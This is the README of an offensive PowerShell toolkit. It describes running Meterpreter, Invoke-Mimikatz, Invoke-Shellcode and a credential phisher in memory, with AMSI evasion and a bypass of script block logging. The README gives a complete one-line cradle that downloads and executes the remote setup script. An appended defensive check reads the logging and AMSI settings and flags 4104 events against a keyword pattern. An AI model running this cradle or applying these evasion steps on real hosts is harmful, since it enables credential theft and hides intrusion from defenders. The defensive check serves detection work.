This repository was created for learning / demonstration purposes and is based on a post by @xpn; more details are available here.
The goal is:
- Perform everything in memory without touching the hard disk
- Run well-known scripts without being intercepted by the AV
- Execute a Meterpreter payload without being intercepted by the AV
- Minimize the traces left in Event Viewer
The main script Setup.ps1 runs the commands needed to protect our operational security (only partially):
- Script block logging bypass by Ryan Cobb (@cobbr_io)
Setup.ps1 together with AMSI-Setup.ps1 applies one of the following AMSI evasion techniques:
- Reflection by Matt Graeber (@mattifestation)
- Patching by Tal Liberman (@Tal_Liberman)
- Error forcing by Adam Chester (@xpn)
Once the setup phase is over, you can run the console and all its scripts without any obfuscation. In fact, only the commands needed for the AMSI evasion technique are obfuscated. The commands needed for the script block logging bypass are also obfuscated, not to evade AMSI but to leave as little trace as possible in Event Viewer.
This repository contains well-known scripts such as Invoke-Mimikatz, Invoke-Shellcode and Invoke-CredentialPhisher, which have been patched or customized to fix issues and ease integration.
To start the console, run this line:
powershell -Execution bypass "iex((New-Object System.Net.WebClient).DownloadString('https://raw.githubusercontent.com/b4rtik/PowerTheShell/master/Setup.ps1'))"
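To verify on the target what the setup actually left behind, the following PowerShell check is an added example and is not part of PowerTheShell. It reads the script block logging policy key, lists the registered AMSI providers and pulls the most recent 4104 script block events, flagging those that match a constructed pattern (the `$Pattern` default and the `Suspect` column are this example's own choice, not anything the project defines). Run it from an elevated session, since reading the PowerShell Operational log requires administrative rights.

```powershell
# Added example, not part of PowerTheShell: inspect the host's logging posture
# and the trace left in Event Viewer after running the Setup.ps1 cradle.
# Requires an elevated PowerShell 5.x session.

function Get-ScriptBlockLoggingPolicy {
    # Policy key written by the "Turn on PowerShell Script Block Logging" GPO.
    $key = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
    if (-not (Test-Path $key)) { return 'not configured by policy' }
    $v = (Get-ItemProperty -Path $key -ErrorAction SilentlyContinue).EnableScriptBlockLogging
    if ($v -eq 1) { 'enabled' } else { 'disabled' }
}

function Get-AmsiProviders {
    # AMSI providers register their CLSIDs here; an empty list means no provider
    # is wired up to scan script content on this host.
    $key = 'HKLM:\SOFTWARE\Microsoft\AMSI\Providers'
    if (-not (Test-Path $key)) { return @() }
    Get-ChildItem -Path $key | ForEach-Object { $_.PSChildName }
}

function Get-RecentScriptBlocks {
    param(
        [int]$Count = 20,
        # Constructed pattern for this example: cradle and bypass keywords to highlight.
        [string]$Pattern = 'DownloadString|IEX|Invoke-Expression|amsi|ScriptBlockLogging'
    )
    # Event 4104 carries the script block text in the third property.
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $Count -ErrorAction SilentlyContinue |
        ForEach-Object {
            $text = $_.Properties[2].Value
            [pscustomobject]@{
                Time    = $_.TimeCreated
                Level   = $_.LevelDisplayName
                Suspect = ($text -match $Pattern)
                Text    = $text
            }
        }
}

"Script block logging policy : $(Get-ScriptBlockLoggingPolicy)"
"AMSI providers registered   : $((Get-AmsiProviders) -join ', ')"
Get-RecentScriptBlocks | Format-Table Time, Level, Suspect, Text -AutoSize -Wrap
```

Two caveats worth keeping in mind when reading the output. The one-liner above is itself a script block, so it is compiled, and therefore logged, before anything inside Setup.ps1 has a chance to run; the bypass only affects what comes afterwards. And "not configured by policy" does not mean nothing is logged: PowerShell 5 writes 4104 events at Warning level for script blocks that match its built-in suspicious patterns even when the policy is off, which is exactly why the bypass commands themselves are obfuscated.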